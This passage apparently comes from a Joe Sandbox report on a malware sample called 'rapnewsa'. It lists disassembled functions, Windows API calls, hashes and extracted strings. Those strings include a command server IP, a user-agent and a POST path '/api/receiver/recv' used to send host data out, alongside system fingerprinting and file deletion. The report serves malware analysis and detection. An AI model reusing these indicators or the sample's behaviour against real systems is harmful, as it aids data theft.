                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: InfoSystem
                            • String ID:
                            • API String ID: 31276548-0
                            • Opcode ID: 3c3ada10847c12af956f9bcc9d0b3babe23114e369b6df29cdd35786c62df84d
                            • Instruction ID: ef6c3b850877cafdd96a9aa049b81144398ba9d4e9a36419995bf509644cdd3d
                            • Opcode Fuzzy Hash: 3c3ada10847c12af956f9bcc9d0b3babe23114e369b6df29cdd35786c62df84d
                            • Instruction Fuzzy Hash: 51D0C97890520C9BCB04DFD5D94989AB7FDAB88205F1085A5DD4957300EA32AA568BD1
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: ef4ba2a5f8b20fe9ebf94c7ad4fd4042bc574524729372173bfe9cd158506bc7
                            • Instruction ID: 335bcec336d09bce9cf10e8872e98f95a174684297b753749333d47cadc65724
                            • Opcode Fuzzy Hash: ef4ba2a5f8b20fe9ebf94c7ad4fd4042bc574524729372173bfe9cd158506bc7
                            • Instruction Fuzzy Hash: E741F33DA04205EBDB14CFA8D952B69B7B69BC5300F2082A8E5014F7D9D736DF42CB60

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 29 a42810-a42855 31 a42857 29->31 32 a4285c-a428c1 29->32 33 a4291a 31->33 39 a428c5-a428e7 CreateThread 32->39 40 a428c3 32->40 34 a4291c-a4291f 33->34 41 a428e9 39->41 42 a428eb-a4290f CreateThread 39->42 40->33 41->33 43 a42911 42->43 44 a42913-a42918 42->44 43->33 44->34
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0u$0u0u$0u0u$45.125.66.18$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.4$`
                            • API String ID: 0-2265949662
                            • Opcode ID: 0c18c2d5237ec17a53f53b42016c780b469e825eafd8b2eb4dfe179192d33c82
                            • Instruction ID: 6058e133df44a7fec3ea0facb2a608e3289d0468fc838ff403f9e23044bf677c
                            • Opcode Fuzzy Hash: 0c18c2d5237ec17a53f53b42016c780b469e825eafd8b2eb4dfe179192d33c82
                            • Instruction Fuzzy Hash: A4310579640208BFE710CF94CC46FA97B75BB88701F608154FA099F2D1C3B5AA86CB95

                            Control-flow Graph

                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000000,082e2202-17f7-4654-a651-ac9a3778e1d7), ref: 00A41D43
                            • GetLastError.KERNEL32 ref: 00A41D52
                            • Sleep.KERNELBASE(00001388), ref: 00A41E1C
                            • CloseHandle.KERNEL32(00000000), ref: 00A41E3A
                            • ExitProcess.KERNEL32 ref: 00A41E42
                            Strings
                            • 082e2202-17f7-4654-a651-ac9a3778e1d7, xrefs: 00A41D3A
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: CloseCreateErrorExitHandleLastMutexProcessSleep
                            • String ID: 082e2202-17f7-4654-a651-ac9a3778e1d7
                            • API String ID: 168847217-1460249064
                            • Opcode ID: a98019ffa38849468887a309582a94e6358f80fca8d8fc8db891681b2ecdf95f
                            • Instruction ID: 18fb45ee3589ce845423bfb98409cb849d4bb99b8ba413ecc97b499f4466eb49
                            • Opcode Fuzzy Hash: a98019ffa38849468887a309582a94e6358f80fca8d8fc8db891681b2ecdf95f
                            • Instruction Fuzzy Hash: 4F31F4BDD00219EBDF64DBA4DD46BEE77B1ABD4300F100065E805B2181DB759E85DBA2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 137 a42e60-a42e66 138 a42e6d-a42e74 137->138 139 a430af-a430b2 138->139 140 a42e7a-a42e80 138->140 141 a42e8e-a42e97 140->141 142 a42e9d-a42ea9 141->142 143 a4309f-a430aa Sleep 141->143 144 a42eaf-a42ebe 142->144 145 a4309a 142->145 143->138 146 a42ed5-a42ef8 call a491d0 144->146 147 a42ec0-a42ecf 144->147 145->143 150 a42f10-a42f2c 146->150 151 a42efa-a42f0b call a42920 146->151 147->145 147->146 153 a42f32-a42f6e 150->153 154 a42fc3-a42ff0 call a41ea0 150->154 157 a42e82-a42e8a 151->157 159 a42f87-a42faa 153->159 160 a42f70-a42f82 153->160 164 a42ff2-a42ffd 154->164 165 a43009-a43061 154->165 157->141 159->154 166 a42fac-a42fb7 159->166 160->157 164->165 167 a43068-a4306f 165->167 166->154 168 a43071-a4307c 167->168 169 a43088-a43093 167->169 168->169 169->145
                            APIs
                            • Sleep.KERNELBASE(000003E8), ref: 00A430A4
                              • Part of subcall function 00A41EA0: RtlAllocateHeap.NTDLL(02D10000,00000008,00A43D82), ref: 00A41EB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: AllocateHeapSleep
                            • String ID: /api/receiver/recv$Content-Type: application/octet-stream$POST
                            • API String ID: 4201116106-1595302217
                            • Opcode ID: 84b811eaa6188ee5064e0e697ba8e5d6cb6f909eed4bf66449d4a8f3c7a6ab0d
                            • Instruction ID: bc65c40130024a65ec61b3f1dd3c25b62f70c1359b436aa8a09c04a1cc817ba4
                            • Opcode Fuzzy Hash: 84b811eaa6188ee5064e0e697ba8e5d6cb6f909eed4bf66449d4a8f3c7a6ab0d
                            • Instruction Fuzzy Hash: 5C713AB8A00219EBCB14CF84D544BB9BBB1FF88714F608598F9465B381D775EE81DBA0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 195 a43ef0-a43f10 VirtualAlloc 196 a43f16-a43f33 VirtualAlloc 195->196 197 a43f12-a43f14 195->197 199 a43f35-a43f37 196->199 200 a43f39-a43f56 VirtualAlloc 196->200 198 a43f61-a43f62 197->198 199->198 201 a43f5c 200->201 202 a43f58-a43f5a 200->202 201->198 202->198
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,00000015,00003000,00000040,?,00A43D5B,?,00A41D86,?), ref: 00A43EFE
                            • VirtualAlloc.KERNELBASE(00000000,00000015,00003000,00000040,?,00A43D5B,?,00A41D86,?), ref: 00A43F21
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: b81513b619e466ffb39c44f52ef87cde176ef5dfacb95810ecad9797b183b6b8
                            • Instruction ID: 425d2330e1ef7058121c59b17608fe1880eae397844fd1f7c536348ffee350d3
                            • Opcode Fuzzy Hash: b81513b619e466ffb39c44f52ef87cde176ef5dfacb95810ecad9797b183b6b8
                            • Instruction Fuzzy Hash: E1F0303DAA9304EEFB209BE9AC5EB1135B453CAB17F101414B306AD1D0E3B6D6468A25

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 203 a42c09-a42c10 204 a42cd5-a42cdc 203->204 205 a42c16-a42c6b call a491d0 203->205 207 a42d76-a42d7d 204->207 208 a42ce2-a42d06 204->208 226 a42cc4-a42cc9 205->226 227 a42c6d-a42c74 205->227 209 a42d93-a42d9a 207->209 210 a42d7f-a42d83 207->210 212 a42d08-a42d0f 208->212 213 a42d29-a42d4c call a42060 208->213 217 a42da6-a42da9 209->217 218 a42d9c-a42d9f 209->218 215 a42d85-a42d8a 210->215 216 a42d91 210->216 219 a42d11-a42d14 212->219 220 a42d1b-a42d27 call a41ee0 212->220 224 a42d74 213->224 225 a42d4e-a42d6d 213->225 215->216 216->217 218->217 219->220 220->224 224->217 225->224 231 a42cd0 226->231 229 a42c76-a42c7d 227->229 230 a42c88-a42c92 227->230 229->230 232 a42c7f-a42c86 229->232 233 a42c94-a42c96 ExitProcess 230->233 234 a42c9c 230->234 231->217 232->230 235 a42c9e-a42ca5 232->235 234->226 236 a42ca7-a42cae 235->236 237 a42cb0-a42cba 235->237 236->226 236->237 237->226 238 a42cbc-a42cbe ExitProcess 237->238
                            APIs
                              • Part of subcall function 00A491D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A491FE
                            • ExitProcess.KERNEL32 ref: 00A42C96
                            • ExitProcess.KERNEL32 ref: 00A42CBE
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: ExitProcess$Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 2431947247-0
                            • Opcode ID: c4559ae39af4f2e81a8d04b8c7fd3d94c09c3f6da31a2ddf381203522413d03b
                            • Instruction ID: fbbe51cc375775a1013879d39254bb091fc03f15a751a7305614a2d44f54ecc1
                            • Opcode Fuzzy Hash: c4559ae39af4f2e81a8d04b8c7fd3d94c09c3f6da31a2ddf381203522413d03b
                            • Instruction Fuzzy Hash: 6B511978900208EFDB58CF84C998FAEB7B1BF88305F608298E5055B291C775EE81DF90

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 239 a48cc0-a48cd2 GetPhysicallyInstalledSystemMemory 240 a48cd4-a48ceb call a49260 239->240 241 a48cf2-a48cf5 239->241 240->241
                            APIs
                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(00A43265,00A43265,00A43147,?,?,?,?,?,?,?,?,?,00A43147), ref: 00A48CCA
                            • __aulldiv.LIBCMT ref: 00A48CE3
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: InstalledMemoryPhysicallySystem__aulldiv
                            • String ID:
                            • API String ID: 3833932492-0
                            • Opcode ID: 65d05738c648c6e555e4072c6ebc5691252314688422b34a0d9f2a20b6d13689
                            • Instruction ID: e9bbe1eaec58e98df3d60df51e33dd610aac218bacf108331fb9179e93742775
                            • Opcode Fuzzy Hash: 65d05738c648c6e555e4072c6ebc5691252314688422b34a0d9f2a20b6d13689
                            • Instruction Fuzzy Hash: BAE08C3C604208B7CB00DFE0DC45B9B777CAB88701F0081A8B908A7280DF71AA01C7E5

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 244 a48c70-a48c96 KiUserCallbackDispatcher GetSystemMetrics
                            APIs
                            • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00A48C75
                            • GetSystemMetrics.USER32(00000001), ref: 00A48C86
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: CallbackDispatcherMetricsSystemUser
                            • String ID:
                            • API String ID: 365337688-0
                            • Opcode ID: 8e4a8a1e6e571ccc9cb2e8f178e1a75fe9f48341829b39c7d62cde66ecf8e43e
                            • Instruction ID: abb2c4728ca3ba88a6bfc6fa4d0ce89c7a0d4fb107c14564e98ec0b66615b55e
                            • Opcode Fuzzy Hash: 8e4a8a1e6e571ccc9cb2e8f178e1a75fe9f48341829b39c7d62cde66ecf8e43e
                            • Instruction Fuzzy Hash: D4D09238184308AFD700DF90D809B94BBA8FB99751F10C166ED4D4A381DAB255428AE2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 245 a41110-a41127 246 a412e5-a412e8 245->246 247 a4112d-a41187 call a42170 call a42250 call a490f0 245->247 254 a411b0-a411b4 247->254 255 a41189-a411ab call a436d0 247->255 257 a411bf-a411c9 254->257 260 a412d9-a412e2 call a41ee0 255->260 259 a411cf-a411e1 257->259 257->260 262 a411e5-a411fa 259->262 263 a411e3 259->263 260->246 266 a411fc-a41200 262->266 267 a41238-a4123c 262->267 263->257 266->267 270 a41202-a41209 call a490b0 266->270 268 a41254-a41268 267->268 269 a4123e-a41252 267->269 272 a412d4 268->272 273 a4126a-a4127e 268->273 269->268 271 a41280-a412ba call a436d0 269->271 276 a4120e-a41218 270->276 280 a412d2 271->280 281 a412bc-a412c6 271->281 272->260 273->271 273->272 276->267 278 a4121a-a41235 call a42250 call a490f0 276->278 278->267 280->260 281->280 283 a412c8-a412cc DeleteFileW 281->283 283->280
                            APIs
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: DeleteFile
                            • String ID:
                            • API String ID: 4033686569-0
                            • Opcode ID: 2d10f2d79bb612a7440f1d9a7777dc0d984a8afce800c57ec960e6c2f3209c68
                            • Instruction ID: 33951e69f811807f796a64a96b6e661815bb138a4dbde6623ec2a37e697824d8
                            • Opcode Fuzzy Hash: 2d10f2d79bb612a7440f1d9a7777dc0d984a8afce800c57ec960e6c2f3209c68
                            • Instruction Fuzzy Hash: D151B878D04258ABCB04DF94C490BEEBBB6AFC5314F1482A8E955DB342C735EB91CB51

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 286 a41060-a41083 287 a410a4-a410c3 call a48d40 286->287 288 a41085-a4109e SHGetFolderPathW 286->288 290 a410c8-a410cf 287->290 288->287 291 a410d1-a410f6 call a41ec0 call a42b10 290->291 292 a410fd-a41100 290->292 291->292
                            APIs
                            • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,-00000209), ref: 00A4109E
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: FolderPath
                            • String ID:
                            • API String ID: 1514166925-0
                            • Opcode ID: 3be02484de1c9b5ed50946bd5dbd0d3d6e922b8c3cd9eed904d3039bdaa1d034
                            • Instruction ID: e795439392213901542d5829145adeef8b79eb04184564e35356b9008f47eb04
                            • Opcode Fuzzy Hash: 3be02484de1c9b5ed50946bd5dbd0d3d6e922b8c3cd9eed904d3039bdaa1d034
                            • Instruction Fuzzy Hash: C51142B9A00208BBDB00DF98C856FEE7775EB84714F14C168FA285B282D6769A41CB90

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 297 a412f0-a41305 298 a41327-a41353 call a48d40 297->298 299 a41307-a41321 SHGetFolderPathW 297->299 302 a41355-a41361 call a43a20 298->302 303 a41370-a41373 298->303 299->298 305 a41366-a41369 302->305 305->303
                            APIs
                            • SHGetFolderPathW.SHELL32(00000000,10428910,00000000,00000000,00A42520), ref: 00A41321
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: FolderPath
                            • String ID:
                            • API String ID: 1514166925-0
                            • Opcode ID: 90b198d04e0431bcd8fa6dacb601b8af66b9f070e2e4b6c233814d1fe09f5296
                            • Instruction ID: 6b4f17cee7a2c82d35b2db89fa00b2829ca1e68e8ff69320681685180f98f25b
                            • Opcode Fuzzy Hash: 90b198d04e0431bcd8fa6dacb601b8af66b9f070e2e4b6c233814d1fe09f5296
                            • Instruction Fuzzy Hash: B50171B9600208BFDB44DF84CC55FEA7368EB84314F14C2A8FA194F2C2D675AE40CB94

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 306 a48b90-a48ba8 GetCurrentHwProfileA 307 a48bfa-a48bfd 306->307 308 a48baa-a48bb1 306->308 309 a48bd3-a48bdd 308->309 310 a48bb3-a48bd1 call a41f10 308->310 309->307 312 a48bdf-a48bf7 call a41f10 309->312 310->307 312->307
                            APIs
                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 00A48BA0
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: CurrentProfile
                            • String ID:
                            • API String ID: 2104809126-0
                            • Opcode ID: 123e974a487d2a895cd472b501c38c1945f1095de219a5fdf0142504f77ce1c5
                            • Instruction ID: 0e10a9170fa47ba6f163587a69d21715fd3dd3848ba09caa7c1b8636844416c4
                            • Opcode Fuzzy Hash: 123e974a487d2a895cd472b501c38c1945f1095de219a5fdf0142504f77ce1c5
                            • Instruction Fuzzy Hash: 72F0A4B890011CABCF14CB64E891BBE7B79EB84304F14C169FA4597245EB39DB458B51
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c1763a0966187b7fe69525bfce067fe97491bddb1df38c92481f8c84455354e1
                            • Instruction ID: 630966722a05dd9bca3e1aa9becdd67f5154c52bc52aa2fc716a8d9c5dc56df6
                            • Opcode Fuzzy Hash: c1763a0966187b7fe69525bfce067fe97491bddb1df38c92481f8c84455354e1
                            • Instruction Fuzzy Hash: 6EE01ABE910208ABEB009FA4D845BAA37E8ABC8765F40C414B91A8B151D776DD80CBA1
                            APIs
                            • ExitProcess.KERNEL32 ref: 00A41CD0
                              • Part of subcall function 00A41E50: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,00A41CB1,?,00A41D86,?), ref: 00A41E59
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: CreateExitHeapProcess
                            • String ID:
                            • API String ID: 611137554-0
                            • Opcode ID: 0d6b886d4d8359a58756c66a7ce56caa89d10bab1c28017807cc1513ccddc48e
                            • Instruction ID: ec5072d808926f53275ca643ca385318b8069971bffb3bf22e2c22650ba3e4c0
                            • Opcode Fuzzy Hash: 0d6b886d4d8359a58756c66a7ce56caa89d10bab1c28017807cc1513ccddc48e
                            • Instruction Fuzzy Hash: 1DD0677D78170596EA607BF25F4676A368C5ED1784F440420BE08C5692FA16D9918262
                            APIs
                            • RtlFreeHeap.NTDLL(02D10000,00000000,00000000,02B30000), ref: 00A41EFE
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: f0cbcff4f2379d884f7bc6751b0fbe71019ecfca5eafe23c8fdee0fbb937042a
                            • Instruction ID: 87a7ab162ca9905ef2095953f7070a2602d1997348b81f041dc9350c4350f156
                            • Opcode Fuzzy Hash: f0cbcff4f2379d884f7bc6751b0fbe71019ecfca5eafe23c8fdee0fbb937042a
                            • Instruction Fuzzy Hash: B7E0127851420CFBDB14CFD8D944BA97BF8E745305F104189F90887380D7729E40CB91
                            APIs
                            • HeapCreate.KERNELBASE(00000000,00000000,00000000,?,00A41CB1,?,00A41D86,?), ref: 00A41E59
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: 7106a43d59f415d8f5758be377e890685ed7a2e6f9fcac8d7be59be20f4670f9
                            • Instruction ID: 4b69c4fd7593d638139d4254e6e6c2ca6652ba0993d0dc294ff790c6f2e58309
                            • Opcode Fuzzy Hash: 7106a43d59f415d8f5758be377e890685ed7a2e6f9fcac8d7be59be20f4670f9
                            • Instruction Fuzzy Hash: 61D0123C674308EFF32097B4AC4AB2136D4A3C5755F101521FD19891E0E3B3A8C14634
                            APIs
                            • RtlAllocateHeap.NTDLL(02D10000,00000008,00A43D82), ref: 00A41EB0
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
